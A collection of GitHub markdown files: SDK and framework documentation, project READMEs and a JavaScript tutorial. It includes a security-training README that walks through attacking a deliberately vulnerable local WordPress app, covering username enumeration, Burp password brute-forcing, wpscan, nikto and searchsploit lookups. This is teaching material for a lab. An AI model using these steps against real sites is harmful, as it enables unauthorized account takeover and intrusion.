149e7ef42a65e41ecce9ebe7b62cfb0c9466025c | 1,579 | md | Markdown | docs/vs-2015/extensibility/debugger/reference/idebugmessageevent2-setresponse.md | klmnden/visualstudio-docs.tr-tr | 82aa1370dab4ae413f5f924dad3e392ecbad0d02 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2020-09-01T20:45:52.000Z | 2020-09-01T20:45:52.000Z | docs/vs-2015/extensibility/debugger/reference/idebugmessageevent2-setresponse.md | klmnden/visualstudio-docs.tr-tr | 82aa1370dab4ae413f5f924dad3e392ecbad0d02 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/vs-2015/extensibility/debugger/reference/idebugmessageevent2-setresponse.md | klmnden/visualstudio-docs.tr-tr | 82aa1370dab4ae413f5f924dad3e392ecbad0d02 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: IDebugMessageEvent2::SetResponse | Microsoft Docs
ms.date: 11/15/2016
ms.prod: visual-studio-dev14
ms.technology: vs-ide-sdk
ms.topic: reference
f1_keywords:
- IDebugMessageEvent2::SetResponse
helpviewer_keywords:
- IDebugMessageEvent2::SetResponse method
- SetResponse method
ms.assetid: 2a5e318d-3225-4abd-83f1-28323baff6c0
caps.latest.revision: 11
ms.author: gregvanl
manager: jillfra
ms.openlocfilehash: cac96c0f5476694b18884fd8d7713a2bec877aef
ms.sourcegitcommit: 08fc78516f1107b83f46e2401888df4868bb1e40
ms.translationtype: MT
ms.contentlocale: tr-TR
ms.lasthandoff: 05/15/2019
ms.locfileid: "65685906"
---
# <a name="idebugmessageevent2setresponse"></a>IDebugMessageEvent2::SetResponse
[!INCLUDE[vs2017banner](../../../includes/vs2017banner.md)]
Sets the response from the message box.
## <a name="syntax"></a>Sözdizimi
```cpp#
HRESULT SetResponse(
DWORD dwResponse
);
```
```csharp
int SetResponse(
uint dwResponse
);
```
#### <a name="parameters"></a>Parametreler
`dwResponse`
[in] Win32 kuralları kullanılarak yanıt belirtir `MessageBox` işlevi. Bkz: [AfxMessageBox](https://msdn.microsoft.com/library/d66d0328-cdcc-48f6-96a4-badf089099c8) Ayrıntılar için işlevi.
## <a name="return-value"></a>Dönüş Değeri
Başarılı olursa döndürür `S_OK`; Aksi takdirde bir hata kodu döndürür.
## <a name="see-also"></a>Ayrıca Bkz.
[IDebugMessageEvent2](../../../extensibility/debugger/reference/idebugmessageevent2.md)
[AfxMessageBox](https://msdn.microsoft.com/library/d66d0328-cdcc-48f6-96a4-badf089099c8)
| 30.365385 | 190 | 0.749842 | tur_Latn | 0.175319 |
149e97277c0c9e34ba2f9d021f4487f9572cbbe3 | 2,188 | md | Markdown | docs/sdk/sdk-by-examples/simple-governance/app-constructor.md | jessysaurusrex/cosmos-sdk | fcd32c2f3df6393d351b506c7af8c2bbb5688b33 | [
"Apache-2.0"
] | null | null | null | docs/sdk/sdk-by-examples/simple-governance/app-constructor.md | jessysaurusrex/cosmos-sdk | fcd32c2f3df6393d351b506c7af8c2bbb5688b33 | [
"Apache-2.0"
] | null | null | null | docs/sdk/sdk-by-examples/simple-governance/app-constructor.md | jessysaurusrex/cosmos-sdk | fcd32c2f3df6393d351b506c7af8c2bbb5688b33 | [
"Apache-2.0"
] | null | null | null | ## Application constructor
**File: [`app/app.go`](https://github.com/cosmos/cosmos-sdk/blob/fedekunze/module_tutorial/examples/simpleGov/app/app.go)**
Now, we need to define the constructor for our application.
```go
func NewSimpleGovApp(logger log.Logger, db dbm.DB) *SimpleGovApp
```
In this function, we will:
- Create the codec
```go
var cdc = MakeCodec()
```
- Instantiate our application. This includes creating the keys to access each of the substores.
```go
// Create your application object.
var app = &SimpleGovApp{
BaseApp: bam.NewBaseApp(appName, cdc, logger, db),
cdc: cdc,
capKeyMainStore: sdk.NewKVStoreKey("main"),
capKeyAccountStore: sdk.NewKVStoreKey("acc"),
capKeyStakingStore: sdk.NewKVStoreKey("stake"),
capKeySimpleGovStore: sdk.NewKVStoreKey("simpleGov"),
}
```
- Instantiate the keepers. Note that keepers generally need access to other module's keepers. In this case, make sure you only pass an instance of the keeper for the functionality that is needed. If a keeper only needs to read in another module's store, a read-only keeper should be passed to it.
```go
app.bankKeeper = bank.NewBaseKeeper(app.accountMapper)
app.stakeKeeper = simplestake.NewKeeper(app.capKeyStakingStore, app.bankKeeper,app.RegisterCodespace(simplestake.DefaultCodespace))
app.simpleGovKeeper = simpleGov.NewKeeper(app.capKeySimpleGovStore, app.bankKeeper, app.stakeKeeper, app.RegisterCodespace(simpleGov.DefaultCodespace))
```
- Declare the handlers.
```go
app.Router().
AddRoute("bank", bank.NewHandler(app.bankKeeper)).
AddRoute("simplestake", simplestake.NewHandler(app.stakeKeeper)).
AddRoute("simpleGov", simpleGov.NewHandler(app.simpleGovKeeper))
```
- Initialize the application.
```go
// Initialize BaseApp.
app.MountStoresIAVL(app.capKeyMainStore, app.capKeyAccountStore, app.capKeySimpleGovStore, app.capKeyStakingStore)
app.SetAnteHandler(auth.NewAnteHandler(app.accountMapper, app.feeCollectionKeeper))
err := app.LoadLatestVersion(app.capKeyMainStore)
if err != nil {
cmn.Exit(err.Error())
}
return app
``` | 35.868852 | 296 | 0.726691 | eng_Latn | 0.342024 |
149eacb64da2e113ffa099e088205e5491b0b20e | 540 | md | Markdown | articles/human-resources/includes/new-licensing.md | vviptg/Dynamics-365-Operations.nb-no | 826fb5a428b9e66f854a116edb0351c4a1d5619e | [
"CC-BY-4.0",
"MIT"
] | 2 | 2020-05-18T17:14:36.000Z | 2021-04-20T21:13:46.000Z | articles/human-resources/includes/new-licensing.md | vviptg/Dynamics-365-Operations.nb-no | 826fb5a428b9e66f854a116edb0351c4a1d5619e | [
"CC-BY-4.0",
"MIT"
] | 6 | 2017-12-12T12:48:00.000Z | 2019-04-30T11:45:53.000Z | articles/human-resources/includes/new-licensing.md | vviptg/Dynamics-365-Operations.nb-no | 826fb5a428b9e66f854a116edb0351c4a1d5619e | [
"CC-BY-4.0",
"MIT"
] | 3 | 2019-10-12T18:16:06.000Z | 2022-01-28T03:23:59.000Z | ---
ms.openlocfilehash: fc878bda211eb9b3462a3629e5997a7eb906900db20ddc600a5cc956da55c413
ms.sourcegitcommit: 42fe9790ddf0bdad911544deaa82123a396712fb
ms.translationtype: HT
ms.contentlocale: nb-NO
ms.lasthandoff: 08/05/2021
ms.locfileid: "6719050"
---
> [!IMPORTANT]
> Dynamics 365 for Finance and Operations is now licensed as Dynamics 365 Finance and Dynamics 365 Supply Chain Management. For more information about these licensing changes, see [Licensing update for Dynamics 365](/dynamics365/licensing/update). | 54 | 273 | 0.831481 | nob_Latn | 0.331733 |
149ecbd4b9c2fa4da8378fe563052db8ee32592b | 209 | md | Markdown | README.md | deomsj/Presentation-Design-Patterns | 196d7f843e9b466bddfc7eeb9cfeb5b18a8714d7 | [
"MIT"
] | null | null | null | README.md | deomsj/Presentation-Design-Patterns | 196d7f843e9b466bddfc7eeb9cfeb5b18a8714d7 | [
"MIT"
] | null | null | null | README.md | deomsj/Presentation-Design-Patterns | 196d7f843e9b466bddfc7eeb9cfeb5b18a8714d7 | [
"MIT"
] | null | null | null | # Design Patterns
## Presentation
See the reveal.js presentation here: [https://captechconsulting.github.io/Presentation-Design-Patterns/](https://captechconsulting.github.io/Presentation-Design-Patterns/)
| 29.857143 | 171 | 0.803828 | yue_Hant | 0.173161 |
149ee6a57cb08e4a1648ee65bf5ac9df4dd018f7 | 1,365 | md | Markdown | README.md | Indrajeet619/Invoice-Loans | f9511db63d29a40567fe00d5fb5cbf4c14093e64 | [
"Apache-2.0"
] | 1 | 2021-11-04T18:11:57.000Z | 2021-11-04T18:11:57.000Z | README.md | Indrajeet619/Invoice-Loans | f9511db63d29a40567fe00d5fb5cbf4c14093e64 | [
"Apache-2.0"
] | null | null | null | README.md | Indrajeet619/Invoice-Loans | f9511db63d29a40567fe00d5fb5cbf4c14093e64 | [
"Apache-2.0"
] | null | null | null | # Invoice-Loans
Invoice Discounting Loans for small businesses
Small businesses have a hard time getting non-collateral loans, and even when they do receive loans, the funding amounts are small. Banks often reject farmers' loans because they require assets as collateral, and they avoid extending large amounts of funding because they don't want to take on the risk. Our system helps entrepreneurs get non-collateral loans while still receiving large amounts of loan funding from lenders on the Kiva platform.
1. A farmer can upload an image of a customer order invoice (for example, a $1000 order) and get zero-interest funding from the Kiva platform. With that funding he can buy the raw materials, such as fertilizers and agricultural equipment, needed to fulfill the customer order. Using this system, small businesses can get large loan amounts and lenders can lend risk-free.
2. After the customer pays back, the amount is added to the lender's account.
3. The advantage of invoice discounting is that it is available to small businesses that might have been denied traditional bank finance in the past, and businesses don't have to provide assets as collateral.
4. It offers a flexible finance solution that fits a business's requirements, and businesses can get funding in a short time.
5. The whole process happens digitally, and a loan can be issued in a few days.
Install dependencies using `npm install`, then run `node server.js`.
| 105 | 397 | 0.807326 | eng_Latn | 0.99974 |
149fa50228a8d22e973d05dbfe3925f6f8f2e40b | 1,687 | md | Markdown | Practice/javascript-beginners-tutorial/md/11.06.01.js.array.access.loop.md | side-projects-42/INTERVIEW-PREP-COMPLETE | 627a3315cee4bbc38a0e81c256f27f928eac2d63 | [
"MIT"
] | 13 | 2021-03-11T00:25:22.000Z | 2022-03-19T00:19:23.000Z | Practice/javascript-beginners-tutorial/md/11.06.01.js.array.access.loop.md | side-projects-42/INTERVIEW-PREP-COMPLETE | 627a3315cee4bbc38a0e81c256f27f928eac2d63 | [
"MIT"
] | 160 | 2021-04-26T19:04:15.000Z | 2022-03-26T20:18:37.000Z | Practice/javascript-beginners-tutorial/md/11.06.01.js.array.access.loop.md | side-projects-42/INTERVIEW-PREP-COMPLETE | 627a3315cee4bbc38a0e81c256f27f928eac2d63 | [
"MIT"
] | 12 | 2021-04-26T19:43:01.000Z | 2022-01-31T08:36:29.000Z | 11. # Array
1. An Array is a special type of variable/object which `consists of / stores multiple values`
1. Arrays are complex variables that allow us to store more than one value, or a group of values, under a single variable name
1. Arrays are defined with `square brackets [ ]` and with the `new` keyword
1. Array items are normally separated with `commas ,`
1. Arrays are zero-indexed, i.e. the first element of an array is at index/position 0
1. An Array is an ordered collection, where we have a 0th, a 1st, a 2nd, and so on element
1. Each value (an `element`) in an array has a `numeric position`, known as its `index`, which `starts from 0`, so that the first array element is arr[0], not arr[1]
## Different ways to create/define an Array:
1. By array literal
2. By creating an instance of Array directly (using the new keyword)
3. By using an Array constructor (using new keyword)
## 11.06. Accessing/Looping through Array Elements
- Array elements can be accessed by their `index` using the square bracket notation, i.e. `[index]`
- Arrays are `zero-indexed`, i.e. the first element of an array is at index/position 0
- An array is an `ordered collection`, where we have a 0th, a 1st, a 2nd, and so on element
- Each value (an `element`) in an array has a `numeric position`, known as its `index`, which `starts from 0`, so that the first array element is `arr[0]`, not arr[1]
- One can use a `for loop` in coordination with the array `length` property to access each element of an array in sequential order
- myarray[indexNumber], e.g. myarray[0] // get the first array element
## Example Output: Loop through an Array Elements - Different JavaScript Frameworks
| 62.481481 | 173 | 0.720806 | eng_Latn | 0.998825 |
149fd8f1b4da674eff8f570b5cb25c018f7d923e | 8,128 | md | Markdown | owasp-top10-2017-apps/a6/misconfig-wordpress/README.md | REPTILEHAUS/secDevLabs | 2b396d10f050894cbf3506c24a1e8f3f84338698 | [
"BSD-3-Clause"
] | 1 | 2020-07-25T19:11:48.000Z | 2020-07-25T19:11:48.000Z | owasp-top10-2017-apps/a6/misconfig-wordpress/README.md | paralelo14/secDevLabs | 2b396d10f050894cbf3506c24a1e8f3f84338698 | [
"BSD-3-Clause"
] | null | null | null | owasp-top10-2017-apps/a6/misconfig-wordpress/README.md | paralelo14/secDevLabs | 2b396d10f050894cbf3506c24a1e8f3f84338698 | [
"BSD-3-Clause"
] | 1 | 2020-01-10T12:52:48.000Z | 2020-01-10T12:52:48.000Z | # Vulnerable Wordpress Misconfig
<p align="center">
<img src="images/banner.png"/>
</p>
This is a simple WordPress web application that contains an example of a Security Misconfiguration vulnerability, and its main goal is to describe how a malicious user could exploit multiple Security Misconfiguration vulnerabilities intentionally installed on SecWeb.
## Index
- [Definition](#what-is-security-misconfiguration)
- [Setup](#setup)
- [Attack narrative](#attack-narrative)
- [Objectives](#secure-this-app)
- [Solutions](#pr-solutions)
- [Contributing](#contributing)
## What is Security Misconfiguration?
Security misconfiguration can happen at any level of an application stack, including the network services, platform, web server, application server, database, frameworks, custom code, and pre-installed virtual machines, containers, or storage. Automated scanners are useful for detecting misconfigurations, use of default accounts or configurations, unnecessary services, legacy options, etc.
The main goal of this app is to discuss how **Security Misconfiguration** vulnerabilities can be exploited and to encourage developers to send secDevLabs Pull Requests on how they would mitigate these flaws.
## Setup
To start this intentionally **insecure application**, you will need [Docker][Docker Install] and [Docker Compose][Docker Compose Install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start:
```sh
cd secDevLabs/owasp-top10-2017-apps/a6/misconfig-wordpress
```
```sh
make install
```
Then simply visit [localhost:8000][App] ! 😆
## Get to know the app 📄
To properly understand how this application works, you can try to:
- Visit it's homepage!
## Attack narrative
Now that you know the purpose of this app, what could possibly go wrong? The following section describes how an attacker could identify and eventually find sensitive information about the app or it's users. We encourage you to follow these steps and try to reproduce them on your own to better understand the attack vector! 😜
### 👀
#### Verbose error message allows for username enumeration
It's possible to reach the site through the HTTP port 8000, as shown by the image below:
<p align="center">
<img src="images/banner.png"/>
</p>
Having a closer look at what's written below `SECWEB`, we have a sign that the site might be using the WordPress CMS. We can confirm that suspicion by trying to access the `/wp-admin` page. As we can see from the image below, our suspicion is confirmed:
<p align="center">
<img src="images/attack1.png"/>
</p>
An attacker could try to log in with the username: `admin` and realize, through the error message, that `admin` is a valid user, as depicted by the image below:
<p align="center">
<img src="images/attack2.png"/>
</p>
### 🔥
At this moment, an attacker could use [Burp Suite](https://portswigger.net/burp) to perform a brute force attack using this [wordlist] (if you need any help setting up your proxy, you should check this [guide](https://support.portswigger.net/customer/portal/articles/1783066-configuring-firefox-to-work-with-burp)). To do so, after finding the login POST request, right-click and send it to Intruder, as shown below:
<p align="center">
<img src="images/attack10.png"/>
</p>
In the `Positions` tab, all fields must be cleared first via the `Clear §` button. To set `pwd` to change according to each password from our dictionary wordlist, simply click on the `Add §` button after selecting it:
<p align="center">
<img src="images/attack11.png"/>
</p>
If a valid password is found, the application may process new cookies and eventually redirect the flow to other pages. To guarantee that the brute force attack follows this behavior, set `Always` in the `Follow Redirections` options of the `Options` tab, as shown below:
<p align="center">
<img src="images/attack13.png"/>
</p>
In `Payloads` tab, simply choose the wordlist from `Load...` option and then the attack may be performed via `Start attack` button:
<p align="center">
<img src="images/attack12.png"/>
</p>
After sending around 200 requests to try to obtain a valid admin password, it is possible to see from the image below that the app redirected us when the password `password` was used, giving us evidence that it might be the `admin` password.
<p align="center">
<img src="images/attack3.png"/>
</p>
The suspicion was confirmed when trying to log in with these credentials, as shown below:
<p align="center">
<img src="images/attack3.1.png"/>
</p>
-----
### 👀
#### Outdated WordPress is vulnerable to an authenticated arbitrary file deletion
Now that we know we're dealing with WordPress, we can use the [WPScan] tool to sweep the app in search of known vulnerabilities. The following command can be used to install it:
```sh
brew install wpscan
```
And then use this command to start a new simple scan:
```sh
wpscan -u localhost:8000
```
<p align="center">
<img src="images/attack4.png"/>
</p>
### 🔥
As seen in the image above, the tool found that the CMS version is outdated and vulnerable to an authenticated arbitrary file deletion. Using the [searchsploit] tool, an attacker could find [malicious code] to exploit this vulnerability.
To install this tool, simply type the following in your OSX terminal:
```sh
brew install exploitdb
```
Then simply search for the version of the CMS found:
```sh
searchsploit wordpress 4.9.6
```
<p align="center">
<img src="images/attack5.png"/>
</p>
----
## 👀
#### Security misconfiguration allows for a browseable directory on the server
By having another look at the results from [WPScan], it's possible to see that the tool found a browseable directory in the app: `/wp-content/uploads/`, as we can see from the image below:
<p align="center">
<img src="images/attack6.png"/>
</p>
## 🔥
We can confirm that the directory is browseable by accessing it through a web browser, as shown by the following image:
<p align="center">
<img src="images/attack7.png"/>
</p>
----
## 👀
#### Misconfigured headers gives away unnecessary information about the server
Using the [Nikto] tool to perform a security scan, it's possible to see that there are multiple points of attention regarding security headers.
To install it, you can use the following command in your OSX terminal:
```sh
brew install nikto
```
Then scan the web app using:
```sh
nikto -h http://localhost:8000/
```
<p align="center">
<img src="images/attack8.png"/>
</p>
Now, by doing the following curl command to check the HTTP headers of the application, we can confirm that it indeed exposes the PHP version installed, as shown by the image below:
<p align="center">
<img src="images/attack9.png"/>
</p>
----
## Secure this app
How would you mitigate this vulnerability? After your changes, an attacker should not be able to:
* See verbose error messages
* Log in with default credentials
* See verbose tokens
* Find an outdated CMS version
Note: In this particular app, due to how it works, you can simply write down the changes you would make to mitigate those vulnerabilities and submit them as a pull request.
## PR solutions
[Spoiler alert 🚨] To understand how this vulnerability can be mitigated, check out [these pull requests](https://github.com/globocom/secDevLabs/pulls?q=is%3Apr+label%3A%22mitigation+solution+%F0%9F%94%92%22+label%3A%22Vuln+Wordpress+Misconfig%22)!
## Contributing
We encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../../../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉
[Docker Install]: https://docs.docker.com/install/
[Docker Compose Install]: https://docs.docker.com/compose/install/
[App]: http://localhost:8000
[wordlist]: https://github.com/danielmiessler/SecLists/blob/master/Passwords/UserPassCombo-Jay.txt
[wpscan]:https://wpscan.org/
[malicious code]: https://www.exploit-db.com/exploits/44949
[nikto]: https://cirt.net/Nikto2
[searchsploit]: https://www.exploit-db.com/searchsploit
| 35.649123 | 413 | 0.745817 | eng_Latn | 0.988493 |
149ff20c3a611b58bc714966079b1809d39226ed | 1,047 | md | Markdown | README.md | SirPumpkin301/HW.17-Workout-Tracker | ec7bedc50a7e3ddc393c414032b41d6ea2ac276c | [
"MIT"
] | null | null | null | README.md | SirPumpkin301/HW.17-Workout-Tracker | ec7bedc50a7e3ddc393c414032b41d6ea2ac276c | [
"MIT"
] | null | null | null | README.md | SirPumpkin301/HW.17-Workout-Tracker | ec7bedc50a7e3ddc393c414032b41d6ea2ac276c | [
"MIT"
] | null | null | null | # Unit 17: Workout Tracker

Allows the user to track a workout. Various attributes of the workout can be stored. I did the best I could.
## Description
Created a fitness tracking app utilizing Node.js, Express.js, MongoDB, Heroku and Mongoose. Allows the user to track their workouts and save them in a database.
## Live site:
https://hw17workouttracker.herokuapp.com/
## Images
Image of main view:

Image of adding exercises:

Image of Workout Dashboard

## Installation
To install necessary dependencies, run the following command:
```
npm i
```
You will need to run `npm i` to install all the required node modules.
## Usage
The primary reason for building this app was that it was a homework requirement.
| 26.846154 | 160 | 0.758357 | eng_Latn | 0.970788 |
14a0a87e09e4f21ad32ebd86064afdef3e7f8ca8 | 3,107 | md | Markdown | src/locations/location-264.md | designtocombatcovid19/testinglocations | 498794cc6433073b5f8dcc76a2adbc7457bfdaee | [
"MIT"
] | null | null | null | src/locations/location-264.md | designtocombatcovid19/testinglocations | 498794cc6433073b5f8dcc76a2adbc7457bfdaee | [
"MIT"
] | 4 | 2021-03-02T01:16:23.000Z | 2022-03-08T23:19:34.000Z | src/locations/location-264.md | designtocombatcovid19/testinglocations | 498794cc6433073b5f8dcc76a2adbc7457bfdaee | [
"MIT"
] | null | null | null | ---
layout: location-page
date: Last Modified
description: "Local COVID-19 testing is available at Urgent Care of Kansas City in Independence, Missouri, USA."
permalink: "locations/missouri/independence/urgent-care-of-kansas-city/"
tags:
- locations
- missouri
title: Urgent Care of Kansas City
uniqueName: urgent-care-of-kansas-city
state: Missouri
stateAbbr: MO
hood: "Independence"
address: "4741 Arrowhead Dr, Suite B"
city: "Independence"
zip: "64055"
zipsNearby: "66002 66006 66007 66008 66012 66013 66016 66018 66019 66020 66021 66024 66025 66026 66030 66036 66101 66102 66103 66104 66105 66106 66109 66110 66111 66112 66113 66115 66117 66118 66119 66160 66040 66041 66042 66044 66045 66046 66047 66049 66027 66043 66048 66050 66052 66053 66054 66060 66031 66051 66061 66062 66063 66064 66066 66067 66070 66071 66073 66079 66201 66202 66203 66204 66205 66206 66207 66208 66209 66210 66211 66212 66213 66214 66215 66216 66217 66218 66219 66220 66221 66222 66223 66224 66225 66226 66227 66250 66251 66276 66282 66283 66285 66286 66083 66085 66086 66090 66092 66097 64720 64401 64001 64620 64422 64722 64723 64725 64011 64012 64726 64013 64014 64015 64622 64623 64624 64625 64016 64730 64017 64018 64429 64633 64019 64733 64654 64430 64734 64735 64020 64021 64436 64637 64739 64638 64439 64440 64022 64742 64743 64443 64444 64024 64073 64028 64448 64746 64640 64747 64454 64029 64030 64034 64644 64035 64701 64459 64036 64037 64040 64048 64050 64051 64052 64053 64054 64055 64056 64057 64058 64101 64102 64105 64106 64108 64109 64110 64111 64112 64113 64114 64116 64117 64118 64119 64120 64121 64123 64124 64125 64126 64127 64128 64129 64130 64131 64132 64133 64134 64136 64137 64138 64139 64141 64144 64145 64146 64147 64148 64149 64150 64151 64152 64153 64154 64155 64156 64157 64158 64161 64163 64164 64165 64166 64167 64168 64170 64171 64179 64180 64184 64187 64188 64190 64191 64195 64196 64197 64198 64199 64999 64060 64649 64650 64061 64465 64062 64002 64063 64064 64065 64081 64082 64086 64761 64066 64067 64068 64069 64070 64656 64469 64071 64072 64770 64664 64074 64668 64680 64075 64076 64077 64474 64078 64079 64477 64080 64671 64083 64084 64085 64484 64501 64502 64503 64504 64505 64506 64507 64508 64088 64089 64490 64090 64682 64492 64493 64788 64686 64092 64093 64096 64497 64097 64098 64689 65321 65323 65327 65332 65333 65334 65305 65336 65337 65339 65340 65351 65360 64172 64183 64185 64192 64193 64194 64944 66077 66279"
mapUrl: "http://maps.apple.com/?q=Urgent+Care+of+Kansas+City&address=4741+Arrowhead+Dr+Suite+B,Independence,Missouri,64055"
locationType: Please contact for drive-thru/walk-in availability.
phone: "816-795-6000"
website: "https://www.solvhealth.com/urgent-care-of-kansas-city-independence-mo-AGLeep"
onlineBooking: true
closed: undefined
closedUpdate: June 30th, 2020
notes: "By appointment only. Requires doctor's referral."
days: Weekdays
hours: 8:30AM-9PM
altDays: Sundays
altHours: 8:30AM-5PM
alt2Days: Saturdays
alt2Hours: 8:30AM-6PM
ctaMessage: Schedule a test
ctaUrl: "https://www.solvhealth.com/urgent-care-of-kansas-city-independence-mo-AGLeep"
--- | 91.382353 | 1,988 | 0.814612 | yue_Hant | 0.376268 |
14a1009f60bb03c1599e8fa3ca3eeb72c7e06ee4 | 167 | md | Markdown | README.md | ali-taghizadeh/android_mvp | a074e82915c38e68c0f8d3533e33a4bb438f33ed | [
"Apache-2.0"
] | 1 | 2019-08-19T07:38:15.000Z | 2019-08-19T07:38:15.000Z | README.md | ali-taghizadeh/Android_mvp | a074e82915c38e68c0f8d3533e33a4bb438f33ed | [
"Apache-2.0"
] | null | null | null | README.md | ali-taghizadeh/Android_mvp | a074e82915c38e68c0f8d3533e33a4bb438f33ed | [
"Apache-2.0"
] | null | null | null | # android_mvp
This repository is all about implementing MVP architecture in a simple Android app using Rxjava2 and Realm
<img src="images/Screenshot.png" width="200">
# <img src="BeauCrumley_p1/wwwroot/favicon.png" alt="BEE Logo" width="50"/> Beau's Electronics Emporium
## Project Description
Beau's Electronics Emporium is a concept for an e-commerce platform that could be used by an electronics hobby store. It includes much of the basic functionality one might expect from an online store: user accounts, store pages that display products, and a functioning shopping cart. The application is powered by ASP.NET Core and uses a web API to serve static pages to the client.
## Technologies Used
* ASP.NET Core Web API
* Entity Framework Core
* C#, JavaScript/HTML/CSS, SQL
## Features
* Register new accounts and login.
* Browse products of a store.
* Add/remove items from cart.
* Have order total viewable any time.
* Place orders that automatically update the inventory levels of a store.
To-do list:
* Store selection page.
* Displaying order history of a logged in user.
* (Admin) Display/Sort/Filter all orders by store/product/revenue/customer/etc.
## Getting Started
1. git clone [https://github.com/03012021-dotnet-uta/BeauCrumley_p1.git](https://github.com/03012021-dotnet-uta/BeauCrumley_p1/ "Project Repository")
2. In order to get the project up and running a database will need to be created. Included in the `./Repository/Data/` folder is a file, `DatabaseSetup.sql`, that should have everything needed to create and seed a database to get started.
3. Open a CLI and make sure it is pointed at the `./BeauCrumley_p1/` directory and run the following command: `dotnet run`.
* NOTE: If there is an issue executing the command, ensure the .NET CLI is installed. Learn more at [Microsoft](https://dotnet.microsoft.com/download ".NET Download")
4. Once the build has completed open a browser at `localhost:5001`.
## License
This project uses the following license: [MIT License](https://mit-license.org/ "MIT License").
Siddhi Complex Event Processing Engine
======================================
---
| Branch | Build Status |
| :------------ |:-------------
| master | [](https://wso2.org/jenkins/job/siddhi__java8 )|
---
##### New version of Siddhi v4.0.0 is built in Java 8.
##### Latest Released Version v3.0.5.
For all releases see https://github.com/wso2/siddhi/releases
Siddhi CEP is a lightweight, easy-to-use open-source Complex Event Processing engine (CEP) released as a Java library under the Apache Software License v2.0. Siddhi CEP processes events generated by various event sources, analyses them, and reports the appropriate complex events according to user-specified queries.

This project was initiated as a research project at the University of Moratuwa, Sri Lanka, and is now being improved by WSO2 Inc.
#### Documentation
https://docs.wso2.com/display/CEP420/SiddhiQL+Guide+3.1
#### Try it with [WSO2 Complex Event Processor 4.2](http://wso2.com/products/complex-event-processor/)
https://docs.wso2.com/display/CEP420/Siddhi+Try+It+Tool
Features Supported
------------------
- Filter
- Multiple filter conditions can be defined
- Filters can be applied before and/or after Window operations
- Join
- Supports joining two streams into one based on a condition
- Match operation triggering can be configured (making "left" or "right" or both streams to trigger)
- Supports Left, Right & Full Outer Joins and Inner Join
- Aggregation
  - By default shipped with Avg, Sum, Min, Max, etc
- Supports Custom Aggregations via its pluggable architecture
- Group by
- Supports Group by based on more than one attribute
- Supported for all type of queries
- Having
- Supported for all type of queries
- Window
  - Default Window implementations are: Time Window, Time Batch Window, Length Window, Unique Window, etc
- Supports Window operators via the pluggable architecture
- Conditions and Expressions
- Supporting condition and expression evaluation
- Conditions supported are: and, or, not, ==,!=, >=, >, <=, <, and arithmetic operations
- Attributes supported are: boolean, string, int, long, float, double, object
- Expressions can be implemented as extensions via Siddhi's pluggable architecture
- Pattern processing
- Identifies pattern occurrences within streams
- Supports "every" conditions
- Can temporally process any amount of events from streams with followed-by (->) operation
- Can process two stream at the same time via "and" and "or" conditions
- Can collect multiple number of events, with min and max limit, using "count" condition
- Sequence processing
- Identifies continuous sequence of events from streams
- Can process two stream at the same time using "or" conditions on streams
- Supports zero to many, one to many, and zero to one conditions
- Event Tables
- Support for using historical data in realtime processing
  - Can work with in-memory, RDBMS, or Hazelcast (in-memory data grid) based data collections
- Partitions
- Supports query partitions based on key words and value ranges
- Multiple queries can be grouped within a partition
- Scripting
- Support JavaScript & Scala Scripts within Siddhi Queries
- Query Language
- SQL like query language
- Implemented on Antlr4
- Supports Query, Stream Definition and Query Plan compilation
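As a concrete illustration of the SQL-like query language, here is a minimal SiddhiQL sketch; the stream and query names are illustrative, not taken from this repository:

```sql
-- Define an input stream of stock events
define stream StockStream (symbol string, price float, volume long);

-- Filter events with price > 100, then compute the average price
-- per symbol over a sliding 5-minute time window
@info(name = 'avgPriceQuery')
from StockStream[price > 100]#window.time(5 min)
select symbol, avg(price) as avgPrice
group by symbol
insert into AvgPriceStream;
```

Queries like this are compiled by the Siddhi runtime into an execution plan; see the SiddhiQL guide linked above for the full grammar.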
System Requirements
-------------------
1. Minimum memory - 500 MB (based on in-memory data stored for processing)
2. Processor - Pentium 800MHz or equivalent at minimum
3. Java SE Development Kit 1.7 or higher
4. To build Siddhi CEP from the source distribution, you need JDK 1.7 or later and Maven 3.0.4 or later
## Questions
* Questions are welcome & we are happy to help you integrate Siddhi into your project :)
* Post your questions on http://stackoverflow.com/ tagging ["siddhi"](http://stackoverflow.com/search?q=siddhi)
## How to Contribute
* Please report issues at [Siddhi JIRA](https://wso2.org/jira/browse/SIDDHI)
* Send your bug-fix pull requests to the [master branch](https://github.com/wso2/carbon-event-processing/tree/master)
## Contact us
Siddhi developers can be contacted via the mailing lists:
* Carbon Developers List : dev@wso2.org
* Carbon Architecture List : architecture@wso2.org
#### We welcome your feedback and contribution.
Siddhi CEP Team
## Installation
To get started, you should add the `sagor110090/crud-generator` Composer dependency to your project:
```
composer require sagor110090/crud-generator --dev
```
Once the package is installed, you should register the `Sagor110090\CrudGenerator\CrudGeneratorServiceProvider` service provider. Normally, Laravel 5.5+ will register the service provider automatically.
After that, publish its assets using the `vendor:publish` Artisan command:
```
php artisan vendor:publish --provider="sagor110090\CrudGenerator\CrudGeneratorServiceProvider"
```
### Laravel older than 5.5
If you're using an older version of Laravel (<5.5), just manually add the provider to the `app/Providers/AppServiceProvider.php` file.
```php
public function register()
{
if ($this->app->environment() == 'local') {
        $this->app->register('Sagor110090\CrudGenerator\CrudGeneratorServiceProvider');
}
}
```
And since, we're using `laravelcollective/html` as dependency you should add its service provider in the `config/app.php` file. Check the [docs](https://laravelcollective.com/docs/master/html) for details.
```php
'providers' => [
//...
Collective\Html\HtmlServiceProvider::class,
],
'aliases' => [
//...
'Form' => Collective\Html\FormFacade::class,
'HTML' => Collective\Html\HtmlFacade::class,
],
```
[← Back to index](README.md)
# euromix_irpass
Dancing Stage Euromix - Internet Challenge password generator
Web version: https://987123879113.github.io/euromix_irpass/
## Usage
```
usage: keygen.py [-h] [--license LICENSE]
optional arguments:
-h, --help show this help message and exit
--license LICENSE, -k LICENSE
Machine license key
```
## Building Javascript
Note: pscript is required to build the kicpass.js file used by the webpage.
```
python3 -c "import pscript; pscript.script2js('kicpass.py')"
```
Fire\_Analysis
================
Zjrobbin
12/22/2020
``` r
library(dplyr)
```
##
## Attaching package: 'dplyr'
## The following objects are masked from 'package:stats':
##
## filter, lag
## The following objects are masked from 'package:base':
##
## intersect, setdiff, setequal, union
``` r
library(ggplot2)
